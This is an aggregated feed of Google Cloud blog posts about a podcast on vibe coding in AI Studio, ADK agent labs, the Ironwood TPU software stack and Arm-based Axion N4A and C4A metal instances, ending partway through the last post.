A podcast discussing vibe coding in Google AI Studio

This post guides you through the key ideas from our conversation. Use it to quickly recap topics or dive deeper into specific segments with links and timestamps.

The Build Experience in Google AI Studio – What is it?

This episode focused on the Build feature in Google AI Studio and Logan used the term vibe coding to describe the experience of using it. This feature is designed to radically accelerate how developers create AI-powered apps. The core idea is to move from a natural language prompt of an idea for an app to a live, running application in under a minute. It handles the scaffolding, code generation, and even error correction, allowing you to focus on iterating and refining your idea.

The Factory Floor

The Factory Floor is our segment for getting hands-on. Here, we moved from high-level concepts to practical code with live demos.

Vibe Coding a Virtual Food Photographer

Timestamp: [01:14]

To kick things off, Logan hit the “I’m Feeling Lucky” button to generate a random app idea: a virtual food photographer for restaurant owners. The goal was to build an app that could:

Accept a simple text-based menu.
Generate realistic, high-end photography for each dish.
Allow for style toggles like “rustic and dark” or “bright and modern.”

In about 90 seconds, we had a running web app. Logan fed it a quirky menu of pizza, blueberries, and popcorn, and the app generated images of each. We also saw how you can use AI-suggested features to iteratively adjust the prepared photos—like adding butter to the popcorn, and add functionality—like changing the entire design aesthetic of the site.

Grounding with Google Maps

Timestamp: [10:25]

Next, Logan showcased one of the most exciting new features: grounding with Google Maps. This allows the Gemini models to connect directly to Google Maps to pull in rich, real-time place data without setting up a separate API. He demonstrated a starter template app that acted as a local guide, finding Italian restaurants in Chicago and describing the neighborhood.

Exploring the AI Studio Gallery

Timestamp: [14:55]

For developers looking for inspiration, Logan walked us through the AI Studio Gallery. This is a collection of pre-built, interactive examples that show what the models are capable of. Two highlights were:

Prompt DJ: An app that uses the Lyria model to generate novel, real-time music based on a prompt.
Vibe Check: A fun tool for visually testing and comparing how different models respond to the same prompt, which is becoming a popular way for developers to quickly evaluate a model’s suitability for their use case.

“Yap to App”: A Conversational Pair Programmer

Timestamp: [19:51]

For the final demo, Logan used a speech-to-text input to describe an app idea which he called “Yap to App”. His pitch: an AI pair programmer that could generate HTML code and then vocally coach him on how to improve it. After turning his spoken request into a written prompt, AI Studio built a voice-interactive app. The AI assistant generated a simple HTML card and then, when asked, provided verbal suggestions for improvement.

The Agent Industry Pulse

Timestamp: [26:19]

In this segment, we covered some of the biggest recent launches in the agent ecosystem:

Veo 3.1: Google’s new state-of-the-art video generation model that builds on Veo 3, adding richer native audio and the ability to define the first and last frames of a video to generate seamless transitions. Smitha showcased a quick applet, built entirely in AI Studio, where users can upload a selfie of themselves and generate a video of their future career in AI using Veo 3.1.
Anthropic’s Skills: A new feature that allows you to give Claude specific tools (like an Excel script) that it can decide to use on its own to complete a task. We compared this to Gemini Gems, noting the difference in approach between creating a persona (Gem) and providing a tool (Skill).
Recent Google Launches: Logan highlighted several other key releases, including the new Gemini computer use model for building agents that can navigate browsers, updates to the Flash and Flash-Lite models, and foundational upgrades to the AI Studio experience itself.

Logan Kilpatrick on the Future of AI Development

We also had the chance to discuss the bigger picture with Logan, from developer reactions to the future of models themselves.

Grounding with Google Maps

Timestamp: [31:26]

When asked which launch developers have been most excited about, Logan admitted he was surprised by the overwhelmingly positive reception for grounding with Google Maps. He noted that the Maps API is one of the most widely used developer APIs in the world, and making it incredibly simple to integrate with Gemini unlocked key use cases for countless developers and startups.

From Models to Systems: The Next Frontier

Timestamp: [32:26]

Looking ahead, Logan shared his excitement for the continued progress on code generation, which he sees as a fundamental accelerant for all other AI capabilities. He also pointed out a trend: models are evolving from simple tools into complex systems.

Historically, a model was something that took a token in and produced a token out. Now, models are starting to look more like agents out of the box. They can take actions: spinning up code sandboxes, pinging APIs, and navigating browsers. “Folks have thought about agents and models as these decoupled concepts,” Logan said, “and it feels like they’re coming closer and closer together as the model capabilities keep improving.”

Conclusion

This conversation was a powerful reminder of how quickly the barrier to entry for building sophisticated AI applications is falling. With tools like Google AI Studio, the ability to turn a creative spark into a working prototype is no longer a matter of weeks or days, but minutes. The focus is shifting from complex scaffolding to rapid, creative iteration.

Your turn to build

We hope this episode inspired you to get hands-on. Head over to Google AI Studio to try out vibe coding for yourself, and don’t forget to watch the full episode for all the details.

Connect with us

Logan → LinkedIn, X, BlueSky, blog
Mollie → LinkedIn, X, BlueSky
Smitha → LinkedIn, YouTube, X, Instagram

Read More for the details.

2025 11 07

GCP – Build Your First ADK Agent Workforce

Tibor Kiss Cloud, Google Cloud gcp

The world of Generative AI is evolving rapidly, and AI Agents are at the forefront of this change. An AI agent is a software system designed to act on your behalf. They show reasoning, planning, and memory and have a level of autonomy to make decisions, learn, and adapt.

At its core, an AI agent uses a large language model (LLM), like Gemini, as its “brain” to understand and reason. This allows it to process information from various sources, create a plan, and execute a series of tasks to reach a predefined objective. This is the key difference between a simple prompt-and-response and an agent: the ability to act on a multi-step plan.

The great news is that you can now easily build your own AI agents, even without deep expertise, thanks to Agent Development Kit (ADK). ADK is an open-source Python and Java framework by Google designed to simplify agent creation.

To guide you, this post introduces three hands-on labs that cover the core patterns of agent development:

Building your first autonomous agent
Empowering that agent with tools to interact with external services
Orchestrate a multi-agent system where specialized agents collaborate

Build your first agent

This lab introduces the foundational principles of ADK by guiding you through the construction of a personal assistant agent.

You will write the code for the agent itself and will interact directly with the agent’s core reasoning engine, powered by Gemini, to see how it responds to a simple request. This lab is focused on building the fundamental scaffolding of every agent you’ll create.

aside_block: <ListValue: [StructValue([(‘title’, ‘Go to the lab!’), (‘body’, <wagtail.rich_text.RichText object at 0x7f04342d1dc0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

Empower your agent with tools

An agent without custom tools can only rely on its built-in knowledge. To make it more powerful for your specific use-case, you can give it access to specialized tools. In this lab, you will learn three different ways to add tools:

Build a Custom Tool: Write a currency exchange tool from scratch.
Integrate a Built-in Tool: Add ADK‘s pre-built Google Search tool.
Leverage a Third-Party Tool: Import and use a Wikipedia tool from the LangChain library.

aside_block: <ListValue: [StructValue([(‘title’, ‘Go to the lab!’), (‘body’, <wagtail.rich_text.RichText object at 0x7f04342d1550>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

Build a Team of Specialized Agents

When a task is too complex for a single agent, you can build out a multi-agent team. This lab goes deep into the power of multi-agent systems by having you build a “movie pitch development team” that can research, write, and analyze a film concept.

You will learn how to use ADK’s Workflow Agents to control the flow of work automatically, without needing user input at every step. You’ll also learn how to use the session state to pass information between the agents.

aside_block: <ListValue: [StructValue([(‘title’, ‘Go to the lab!’), (‘body’, <wagtail.rich_text.RichText object at 0x7f04342d1400>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

Summary: Build Your First AI Teammate Today

Ready to build your first AI agents? Dive into the codelabs from this post:

Share your progress and connect with others on the journey using the hashtag #ProductionReadyAI. Happy learning!

Read More for the details.

2025 11 06

GCP – From silicon to softmax: Inside the Ironwood AI stack

Tibor Kiss Cloud, Google Cloud gcp

As machine learning models continue to scale, a specialized, co-designed hardware and software stack is no longer optional, it’s critical. Ironwood, our latest generation Tensor Processing Unit (TPU), is the cutting-edge hardware behind advanced models like Gemini and Nano Banana, from massive-scale training to high-throughput, low-latency inference. This blog details the core components of Google’s AI software stack that are woven into Ironwood, demonstrating how this deep co-design unlocks performance, efficiency, and scale. We cover the JAX and PyTorch ecosystems, the XLA compiler, and the high-level frameworks that make this power accessible.

1. The co-designed foundation

Foundation models today have trillions of parameters that require computation at ultra-large scale. We designed the Ironwood stack from the silicon up to meet this challenge.

The core philosophy behind the Ironwood stack is system-level co-design, treating the entire TPU pod not as a collection of discrete accelerators, but as a single, cohesive supercomputer. This architecture is built on a custom interconnect that enables massive-scale Remote Direct Memory Access (RDMA), allowing thousands of chips to exchange data directly at high bandwidth and low latency, bypassing the host CPU. Ironwood has a total of 1.77 PB of directly accessible HBM capacity, where each chip has eight stacks of HBM3E, with a peak HBM bandwidth of 7.4 TB/s and capacity of 192 GiB.

Unlike general-purpose parallel processors,TPUs are Application-Specific Integrated Circuits (ASICs) built for one purpose: accelerating large-scale AI workloads. The deep integration of compute, memory, and networking is the foundation of their performance. At a high level, the TPU consists of two parts:

Hardware core: The TPU core is centered around a dense Matrix Multiply Unit (MXU) for matrix operations, complemented by a powerful Vector Processing Unit (VPU) for element-wise operations (activations, normalizations) and SparseCores for scalable embedding lookups. This specialized hardware design is what delivers Ironwood’s 42.5 Exaflops of FP8 compute.

Software target: This hardware design is explicitly targeted by the Accelerated Linear Algebra (XLA) compiler, using a software co-design philosophy that combines the broad benefits of whole-program optimization with the precision of hand-crafted custom kernels. XLA’s compiler-centric approach provides a powerful performance baseline by fusing operations into optimized kernels that saturate the MXU and VPU. This approach delivers good “out of the box” performance with broad framework and model support. This general-purpose optimization is then complemented by custom kernels (detailed below in the Pallas section) to achieve peak performance on specific model-hardware combinations. This dual-pronged strategy is a fundamental tenet of the co-design.

The figure below shows the layout of the Ironwood chip:

This specialized design extends to the connectivity between TPU chips for massive scale-up and scale-out for a total of 88473.6 Tbps (11059.2TB/s) for a complete Ironwood superpod.

The building block: Cubes and ICI. Each physical Ironwood host has four TPU chips. A single rack of these hosts has 64 Ironwood chips and forms a “cube”. Within this cube, every chip is connected via multiple high-speed Inter-Chip Interconnect (ICI) links that form a direct 3D Torus topology. This creates an extremely dense, all-to-all network fabric, enabling massive bandwidth and low latency for distributed operations within the cube.

Scaling with OCS: Pods and Superpods To scale beyond a single cube, multiple cubes are connected using an Optical Circuit Switch (OCS) network. This is a dynamic, reconfigurable optical network that connects entire cubes, allowing the system to scale from a small “pod” (e.g., a 256-chip Ironwood pod with four cubes) to a massive “superpod” (e.g., a 9,216-chip system with 144 cubes). This OCS-based topology is key to fault tolerance. If a cube or link fails, the OCS fabric manager instructs the OCS to optically bypass the unhealthy unit and establish new, complete optical circuits connecting only the healthy cubes, swapping in a designated spare. This dynamic reconfigurability allows for both resilient operation and the provisioning of efficient “slices” of any size. For the largest-scale systems, into the hundreds of thousands of chips, multiple superpods can then be connected via a standard Data-Center Network (DCN).

Chips can be configured in different “slices” with different OCS topologies as shown below.

Each chip is connected to 6 other chips in the 3D torus and provides 3 distinct axes for parallelism.

Ironwood delivers this performance while focusing on power efficiency, allowing AI workloads to run more cost-effectively. Ironwood perf/watt is 2x relative to Trillium, our previous-generation TPU. Our advanced liquid cooling solutions and optimized chip design can reliably sustain up to twice the performance of standard air cooling even under continuous, heavy AI workloads. Ironwood is nearly 30x more power efficient than our first Cloud TPU from 2018 and is our most power-efficient chip to date.

It’s the software stack’s job to translate high-level code into optimized instructions that leverage the full power of the hardware. The stack supports two primary frameworks: the JAX ecosystem, which offers maximum performance and flexibility, as well as PyTorch on TPUs, which provides a native experience for the PyTorch community.

2. Optimizing the entire AI lifecycle

We use the principle of a co-designed Ironwood hardware and software stack to deliver maximum performance and efficiency across every phase of model development, with specific hardware and software capabilities tuned for each stage.

Pre-training: This phase demands sustained, massive-scale computation. A full 9,216-chip Ironwood superpod leverages the OCS and ICI fabric to operate as a single, massive parallel processor, achieving maximum sustained FLOPS utilization through different data formats. Running a job of this magnitude also requires resilience, which is managed by high-level software frameworks like MaxText, detailed in Section 3.3, that handle fault tolerance and checkpointing transparently.

Post-training (Fine-tuning and alignment): This stage includes diverse, FLOPS-intensive tasks like supervised fine-tuning (SFT) and Reinforcement Learning (RL), all requiring rapid iteration. RL, in particular, introduces complex, heterogeneous compute patterns. This stage often requires two distinct types of jobs to run concurrently: high-throughput, inference-like sampling to generate new data (often called ‘actor rollouts’), and compute-intensive, training-like ‘learner’ steps that perform the gradient-based updates. Ironwood’s high-throughput, low-latency network and flexible OCS-based slicing are ideal for this type of rapid experimentation, efficiently managing the different hardware demands of both sampling and gradient-based updates. In Section 3.3, we discuss how we provide optimized software on Ironwood — including reference implementations and libraries — to make these complex fine-tuning and alignment workflows easier to manage and execute efficiently.

Inference (serving): In production, models must deliver low-latency predictions with high throughput and cost-efficiency. Ironwood is specifically engineered for this, with its large on-chip memory and compute power optimized for both the large-batch “prefill” phase and the memory-bandwidth-intensive “decode” phase of large generative models. To make this power easily accessible, we’ve optimized state-of-the-art serving engines. At launch, we’ve enabled vLLM, detailed in Section 3.3, providing the community with a top-tier, open-source solution that maximizes inference throughput on Ironwood.

3. The software ecosystem for TPUs

The TPU stack, and Ironwood’s stack in particular, is designed to be modular, allowing developers to operate at the level of abstraction they need. In this section, we focus on the compiler/runtime, framework, and AI stack libraries.

3.1 The JAX path: Performance and composability

JAX is a high-performance numerical computing system co-designed with the TPU architecture. It provides a familiar NumPy-like API backed by powerful function transformations:

jit (Just-in-Time compilation): Uses the XLA compiler to fuse operations into a single, optimized kernel for efficient TPU execution.
grad (automatic differentiation): Automatically computes gradients of Python functions, the fundamental mechanism for model training.
shard_map (parallelism): The primitive for expressing distributed computations, allowing explicit control over how functions and data are sharded across a mesh of TPU devices, directly mapping to the ICI/OCS topology.

This compositional approach allows developers to write clean, Pythonic code that JAX and XLA transform into highly parallelized programs optimized for TPU hardware. JAX is what Google Deepmind and other Google teams use to build, train, and service their variety of models.

For most developers, these primitives are abstracted by high-level frameworks, like MaxText, built upon a foundation of composable, production-proven libraries:

Optax: A flexible gradient processing and optimization library (e.g., AdamW)

Orbax: A library for asynchronous checkpointing of distributed arrays across large TPU slices

Qwix: A JAX quantization library supporting Quantization Aware Training (QAT) and Post-Training Quantization (PTQ)

Metrax: A library for collecting and processing evaluation metrics in a distributed setting

Tunix: A high-level library for orchestrating post-training jobs

Goodput: A library for measuring and monitoring real-time ML training efficiency, providing a detailed breakdown of badput (e.g., initialization, data loading, checkpointing)

3.2 The PyTorch path: A native eager experience

To bring Ironwood’s power to the PyTorch community, we are developing a new, native PyTorch experience complete with support for a “native eager mode”, which executes operations immediately as they are called. Our goal is to provide a more natural and developer-friendly way to access Ironwood’s scale, minimizing the code changes and level of effort required to adapt models for TPUs. This approach is designed to make the transition from local experimentation to large-scale training more straightforward.

This new framework is built on three core principles to ensure a truly PyTorch-native environment:

Full eager mode: Enables the rapid prototyping, debugging, and research workflows that developers expect from PyTorch.
Standard distributed APIs: Leverages the familiar torch.distributed API, built on DTensor, for scaling training workloads across TPU slices.
Idiomatic compilation: Uses torch.compile as the single, unified path to JIT compilation, utilizing XLA as its backend to trace the graph and compile it into efficient TPU machine code.

This ensures the transition from local experimentation to large-scale distributed training is a natural extension of the standard PyTorch workflow.

3.3 Frameworks: MaxText, PyTorch on TPU, and vLLM

While JAX and PyTorch provide the computational primitives, scaling to thousands of chips is a supercomputer management problem. High-level frameworks handle the complexities of resilience, fault tolerance, and infrastructure orchestration.

MaxText (JAX): MaxText is an open-source, high-performance LLM pre-training and post-training solution written in pure Python and JAX. MaxText demonstrates optimized training on its library of popular OSS models like DeepSeek, Qwen, gpt-oss, Gemma, and more. Whether users are pre-training large Mixture-of-Experts (MoE) models from scratch, or leveraging the latest Reinforcement Learning (RL) techniques on an OSS model, MaxText provides tutorials and APIs to make things easy. For scalability and resiliency, MaxText leverages Pathways, which was originally developed by Google DeepMind and now provides TPU users with differentiated capabilities like elastic training and multi-host inference during RL.

PyTorch on TPU: We recently shared our proposal about our PyTorch native experience on TPUs at Pytorch Conference 2025, including an early preview of training on TPU with minimal code changes. In addition to the framework itself, we are working with the community (RFC), investing in reproducible recipes, reference implementations, and migration tools to enable PyTorch users to use their favorite frameworks on TPUs. Expect further updates as this work matures.

vLLM TPU (Serving): vLLM TPU is now powered by tpu-inference, an expressive and powerful new hardware plugin that unifies JAX and PyTorch under a single lowering path – meaning both frameworks are translated to optimized TPU code through one common, shared backend. This new unified backend is not only faster than the previous generation of vLLM TPU but also offers broader model coverage. This integration provides more flexibility to JAX and PyTorch users, running PyTorch models performantly with no code changes while also extending native JAX support, all while retaining the standard vLLM user experience and interface.

3.4 Extreme performance: Custom kernels via Pallas

While XLA is powerful, cutting-edge research often requires novel algorithms e.g. new attention mechanisms, custom padding to handle dynamic ragged tensors and other optimizations for custom MoE models that the XLA compiler cannot yet optimize.

The JAX ecosystem solves this with Pallas, a JAX-native kernel programming language embedded directly in Python. Pallas presents a unified, Python-first experience, dramatically reducing cognitive load and accelerating the iteration cycle. Other platforms lack this unified, in-Python approach, forcing developers to fragment their workflow. To optimize these operations, they must drop into a disparate ecosystem of lower-level tools—from DSLs like Triton and cuTE to raw CUDA C++ and PTX. This introduces significant mental overhead by forcing developers to manually manage memory, streams, and kernel launches, pulling them out of their Python-based environment

This is a clear example of co-design. Developers use Pallas to explicitly manage the accelerator’s memory hierarchy, defining how “tiles” of data are staged from HBM into the extremely fast on-chip SRAM to be operated on by the MXUs. Pallas has two main parts to it.

Pallas: The developer defines the high-level algorithmic structure and memory logistics in Python.
Mosaic: This compiler backend translates the Pallas definition into optimized TPU machine code. It handles operator fusion, determines optimal tiling strategies, and generates software pipelines to perfectly overlap data transfers (HBM-to-SRAM) with computation (on the MXUs), with the sole objective of saturating the compute units.

Because Pallas kernels are JAX-traceable, they are fully compatible with jit, vmap, and grad. This stack provides Python-native extensibility for both JAX and PyTorch, as PyTorch users can consume Pallas-optimized kernels without ever leaving the native PyTorch API. Pallas kernels for PyTorch and JAX models, on both TPU and GPU, are available via Tokamax, the ML ecosystem’s first multi-framework, multi-hardware kernel library.

3.5 Performance engineering: Observability and debugging

The Ironwood stack includes a full suite of tools for performance analysis, bottleneck detection, and debugging, allowing developers to fully optimize their workloads and operate large scale clusters reliably,

Cloud TPU metrics: Exposes key system-level counters (FLOPS, HBM bandwidth, ICI traffic) to Google Cloud Monitoring that can then be exported to popular monitoring tools like Prometheus.

TensorBoard: Visualizes training metrics (loss, accuracy) and hosts the XProf profiler UI.

XProf (OpenXLA Profiler): The essential toolset for deep performance analysis. It captures detailed execution data from both the host-CPU and all TPU devices, providing:

- Trace Viewer: A microsecond-level timeline of all operations, showing execution, collectives, and “bubbles” (idle time).
- Input Pipeline Analyzer: Diagnoses host-bound vs. compute-bound bottlenecks.
- Op Profile: Ranks all XLA/HLO operations by execution time to identify expensive kernels.
- Memory Profiler: Visualizes HBM usage over time to debug peak memory and fragmentation.

Debugging Tools:

- JAX Debugger (jax.debug): Enables print and breakpoints from within jit-compiled functions.
- TPU Monitoring Library: A real-time diagnostic dashboard (analogous to nvidia-smi) for live debugging of HBM utilization, MXU activity, and running processes.

Beyond performance optimization, developers and infra admins can view fleet efficiency and goodput metrics at various levels (e.g., job, reservation) to ensure maximum utilization of their TPU infrastructure.

4. Conclusion

The Ironwood stack is a complete, system-level co-design, from the silicon to the software. It delivers performance through a dual-pronged strategy: the XLA compiler provides broad, “out-of-the-box” optimization, while the Pallas and Mosaic stack enables hand-tuned kernel performance.

This entire co-designed platform is accessible to all developers, providing first-class, native support for both the JAX and the PyTorch ecosystem. Whether you are pre-training a massive model, running complex RL alignment, or serving at scale, Ironwood provides a direct, resilient, and high-performance path from idea to supercomputer.

Get started today with vLLM on TPU for inference and MaxText for pre-training and post-training.

Read More for the details.

2025 11 06

GCP – Unlock 2x better price-performance with Axion-based N4A VMs, now in preview

Tibor Kiss Cloud, Google Cloud gcp

Decision makers and builders today face a constant challenge: managing rising cloud costs while delivering the performance their customers demand. As applications evolve to use scale-out microservices and handle ever-growing data volumes, organizations need maximum efficiency from their underlying infrastructure to support their growing general-purpose workloads.

To meet this need, we’re excited to announce our latest Axion-based virtual machine series: N4A, available in preview on Compute Engine, Google Kubernetes Engine (GKE), Dataproc, and Batch, with support in Dataflow and other services coming soon.

N4A is the most cost-effective N-series VM to date, delivering up to 2x better price-performance and 80% better performance-per-watt than comparable current-generation x86-based VMs. This makes it easier for customers to further optimize the Total Cost of Ownership (TCO) for a broad range of general-purpose workloads. We see this with cloud-native businesses running scale-out web servers and microservices on GKE, enterprise teams managing backend application servers and mid-sized databases, and engineering organizations operating large CI/CD build farms.

At Google Cloud, we co-design our compute offerings with storage, networking and software at every layer of the stack, from orchestrators to runtimes, to deliver exceptional system-level performance and cost-efficiency. N4A’s breakthrough price-performance is powered by our latest-generation Google Axion Processors, built on the Arm® Neoverse® N3 compute core, Google Dynamic Resource Management (DRM) technology, and Titanium, Google Cloud’s custom-designed hardware and software system that offloads networking and storage processing to free up the CPU. Titanium is part of Google Cloud’s vertically integrated software stack — from the custom silicon in our servers to our planet-scale network traversing 7.75 million kilometers of terrestrial and subsea fiber across 42 regions — that is engineered to maximize efficiency and provide the ultra-low latency and high bandwidth to customers at global scale.

Redefining general-purpose compute and enabling AI inference

N4A is engineered for versatility, with a feature set to support your general-purpose and CPU-based AI workloads. It comes in predefined and custom shapes, with up to 64 vCPUs and 512GB of DDR5 in high-cpu (2GB of memory per vCPU), standard (4GB per vCPU), and high-memory (8GB per vCPU) configurations, with instance networking up to 50 Gbps of bandwidth. N4A VMs feature support for our latest generation Hyperdisk storage options, including Hyperdisk Balanced, Hyperdisk Throughput, and Hyperdisk ML (coming later), providing up to 160K IOPS, 2.4GB/s of throughput per instance.

N4A performs well across a range of industry-standard benchmarks that represent the key workloads our customers run every day. For example, relative to comparable current-generation x86-based VM offerings, N4A delivers up to 105% better price-performance for compute-bound workloads, up to 90% better price-performance for scale-out web servers, up to 85% better price-performance for Java applications, and up to 20% better price-performance for general-purpose databases.

Footnote: As of October 2025. Performance based on the estimated SPECrate®2017_int_base, estimated SPECjbb2015, MySQL Transactions/minute (RO), and Google internal Nginx Reverse Proxy benchmark scores run in production on comparable latest-generation generally-available VMs with general purpose storage types. Price-performance claims based on published and upcoming list prices for Google Cloud.

In the real world, early adopters are seeing dramatic price-performance improvements from the new N4A instances.

“At ZoomInfo, we operate a massive data intelligence platform where efficiency is paramount. Our core data processing pipelines, which are critical for delivering timely insights to our customers, run extensively on Dataflow and Java services in GKE. In our preview of the new N4A instances, we measured a 60% improvement in price-performance for these key workloads compared to their x86-based counterparts. This allows us to scale our platform more efficiently and deliver more value to our customers, faster.” – Sergei Koren, Chief Infrastructure Architect, ZoomInfo

“Organizations today need performance, efficiency, flexibility, and scale to meet the computing demands of the AI era; this requires the close collaboration and co-design that is at the heart of our partnership with Google Cloud. As N4A redefines cost-efficiency, customers gain a new level of infrastructure optimization, enabling enterprises to choose the right infrastructure for their workload requirements with Arm and Google Cloud.” – Bhumik Patel, Director, Server Ecosystem Development, Infrastructure Business, Arm

Granular control with Custom Machine Types and Hyperdisk

A key advantage of our N-series VMs has always been flexibility, and with N4A, we are bringing one of our most popular features to the Axion family for the first time: Custom Machine Types (CMT). Instead of fitting your workload into a predefined shape, CMTs on N4A lets you independently configure the amount of vCPU and memory to meet your application’s unique needs. This ability to right-size your instances means you pay only for the resources you use, minimizing waste and optimizing your total cost of ownership.

This same principle of matching resources to your specific workload applies to storage. N4A VMs feature support for our latest generation of Hyperdisk, allowing you to select the perfect storage profile for your application’s needs:

Hyperdisk Balanced: Offers an optimal mix of performance and cost for the majority of general-purpose workloads, with up to 160K IOPs per N4A VM.
Hyperdisk Throughput: Delivers up to 2.4GiBps of max throughput for bandwidth-intensive analytics workloads like Hadoop or Kafka, providing high-capacity storage at an excellent value.
Hyperdisk ML (post GA): Purpose-built for AI/ML workloads, allows you to attach a single disk containing your model weights or datasets to up to 32 N4A instances simultaneously for large-scale inference or training tasks.
Hyperdisk Storage Pools: Instead of provisioning capacity and performance on a per-volume basis, allows you to provision performance and capacity in aggregate, further optimizing costs by up to 50% and simplifying management.

“At Vimeo, we have long relied on Custom Machine Types to efficiently manage our massive video transcoding platform. Our initial tests on the new Axion-based N4A instances have been very compelling, unlocking a new level of efficiency. We’ve observed a 30% improvement in performance for our core transcoding workload compared to comparable x86 VMs. This points to a clear path for improving our unit economics and scaling our services more profitably, without changing our operational model.” – Joe Peled, Sr. Director of Hosting & Delivery Ops

A growing Arm-based Axion portfolio for customer choice

C-series VMs are designed for workloads that require consistently high performance, e.g., medium-to-large-scale databases and in-memory caches. Alongside them, N-series VMs have been a key Compute Engine pillar, offering a balance of price-performance and flexibility, lowering the cost of running workloads with variable resource needs such as scale-out Java/GKE workloads. We released our first Axion-based machine series, C4A, in October 2024, and the introduction of N4A complements C4A, providing a range of Google Axion instances suited to your workloads’ precise needs.

On top of that, GKE unlocks significant price-performance advantages by orchestrating Axion-based C4A and N4A machine types. GKE leverages Custom Compute Classes to provision and mix these machine types, matching workloads to the right hardware. This automated, heterogeneous cluster management allows teams to optimize their total cost of ownership across their entire application stack.

Also joining the Axion family is C4A.metal, Google Cloud’s first Axion bare metal instance that helps builders meet use cases that require access to the underlying physical server to run specialized applications in a non-virtualized environment, such as automotive systems development, workloads with strict licensing requirements, and Android software development. C4A.metal will be available in preview soon.

Supported by the broad and mature Arm ecosystem, adopting Axion is easier than ever, and the combination of C4A and N4A can help you lower the total cost of running your business, without compromising on performance or workload-specific requirements:

N4A for cost optimization and flexibility. Deliberately engineered for general-purpose workloads that need a balance of price and performance, including scale-out web servers, microservices, containerized applications, open-source databases, batch, data analytics, development environments, data preparation and AI/ML experimentation.
C4A for consistently high performance, predictability, and control. Powering workloads where every microsecond counts, such as medium- to large-scale databases, in-memory caches, cost-effective AI/ML inference, and high-traffic gaming servers. C4A delivers consistent performance, offering a controlled maintenance experience for mission-critical workloads, networking bandwidth up to 100 Gbps, and next-generation Titanium Local SSD storage.

“Migrating to Google Cloud’s Axion portfolio gave us a critical competitive advantage. We slashed our compute consumption by 20% while maintaining low and stable latency with C4A instances, such as our Supply-Side Platform (SSP) backend service. Additionally, C4A enabled us to leverage Hyperdisk with precisely the IOPS we need for our stateful workloads, regardless of instance size. This flexibility gives us the best of both worlds – allowing us to win more ad auctions for our clients while significantly improving our margins. We’re now testing the N4A family by running some of our key workloads that require the most flexibility, such as our API relay service. We are happy to share that several applications running in production are consuming 15% less CPU compared to our previous infrastructure, reducing our costs further, while ensuring that the right instance backs the workload characteristics required.” – Or Ben Dahan, Cloud & Software Architect at Rise

Get started with N4A today

N4A is available during preview in the following Google Cloud regions: us-central1 (Iowa), us-east4 (N. Virginia), europe-west3 (Frankfurt) and europe-west4 (Netherlands) with more regions to follow.

We can’t wait to see what you build. To get access, sign-up here. To learn more, check out the N4A documentation.

Read More for the details.

2025 11 06

GCP – Announcing Axion C4A metal: Arm-based Axion VMs for specialized use cases

Tibor Kiss Cloud, Google Cloud gcp

Today, we are thrilled to announce C4A metal, our first bare metal instance running on Google Axion processors, available in preview soon. C4A metal is designed for specialized workloads that require direct hardware access and Arm®-native compatibility.

Now, organizations running environments such as Android development, automotive simulation, CI/CD pipelines, security workloads, and custom hypervisors can run them on Google Cloud, without the performance overheads and complexity of nested virtualization.

C4A metal instances, like other Axion instances, are built on the standard Arm architecture, so your applications and operating systems compiled for Arm remain portable across your cloud, on-premises, and edge environments, protecting your development investment. C4A metal offers 96 vCPUs, 768GB of DDR5 memory, up to 100Gbps of networking bandwidth, with full support for Google Cloud Hyperdisk including Hyperdisk Balanced, Extreme, Throughput, and ML block storage options.

Google Cloud provides workload-optimized infrastructure to ensure the right resources are available for every task. C4A metal, like the Google Cloud Axion virtual machine family, is powered by Titanium, a key component for multi-tier offloads and security that is foundational to our infrastructure. Titanium’s custom-designed silicon offloads networking and storage processing to free up the CPU, and its dedicated SmartNIC manages all I/O, ensuring that Axion cores are reserved exclusively for your application’s performance. Titanium is part of Google Cloud’s vertically integrated software stack — from the custom silicon in our servers to our planet-scale network traversing 7.75 million kilometers of terrestrial and subsea fiber across 42 regions — that is engineered to maximize efficiency and provide the ultra-low latency and high bandwidth to customers at global scale.

Architectural parity for automotive workloads

Automotive customers can benefit from the Arm architecture’s performance, efficiency, and flexible design for in-vehicle systems such as infotainment and Advanced Driver Assistance Systems (ADAS). Axion C4A metal instances enable architectural parity between test environments and production silicon, allowing automotive technology providers to validate their software on the same Arm Neoverse instruction set architecture (ISA) used in production electronic control units (ECUs). This significantly reduces the risk of late-stage integration failures. For performance-sensitive tasks, these customers can execute demanding virtual hardware-in-the-loop (vHIL) simulations with the consistent, low-latency performance of physical hardware, ensuring test results are reliable and accurate. Finally, C4A metal lets providers move beyond the constraints of a physical lab, by dynamically scaling entire test farms and transforming them from fixed capital expenses into flexible operational ones.

“In the era of AI-defined vehicles, the accelerating pace and complexity of technology are pushing us to rethink traditional linear approaches to software development. Google Cloud’s introduction of Axion C4A metal is a major step forward in this journey. By offering full architectural parity on Arm between test environments and physical silicon, customers can benefit from accelerated development cycles, enabling continuous integration and compliance for a variety of specialized use cases.” – Dipti Vachani, Senior Vice President and General Manager, Automotive Business, Arm

“Our partners and customers rely on QNX to deliver the safety, security, reliability, and real-time performance required for their most mission-critical systems — from advanced driver assistance to digital cockpits. As the Software-Defined Vehicle era continues to gain momentum, decoupling software development from physical hardware is no longer optional — it’s essential for innovation at scale. The launch of Google Cloud’s C4A-metal instances on Axion introduces a powerful ARM-based bare metal platform that we are eager to test and support as this will enable transformative cloud infrastructure benefits for our automotive ecosystem.” – Grant Courville, Senior Vice President, Products and Strategy, QNX

“The future of automotive mobility demands unprecedented speed and precision in practice and development. For automakers and suppliers leveraging the Snapdragon Digital Chassis platform, aligning their cloud development and testing environments to ensure parity with the Snapdragon SoCs in the vehicle is absolutely crucial for efficiency and quality. We are excited about Google Cloud’s commitment to this segment — offering C4A-metal instances with Axion is a massive leap forward, giving the automotive ecosystem a true 1:1 physical to virtual environment in the cloud. This breakthrough significantly reduces integration challenges, slashes validation time, and allows our partners to unleash AI-driven features to market faster at scale.” – Laxmi Rayapudi, VP, Product Management, Qualcomm Technologies, Inc.

Align test and production for Android development

The Android platform was built for Arm-based processors, the standard for virtually all mobile devices. By running development and testing pipelines on the bare-metal instances of Axion processors with C4A metal, Android developers can benefit from native performance, eliminating the overhead of emulation management, such as slow instruction-by-instruction translation layers. In addition, they can significantly reduce latency for Android build toolchains and automated test systems, leading to faster feedback cycles. C4A metal also solves the performance challenges of nested virtualization, making it a great platform for scalable Cuttlefish (Cloud Android) environments.

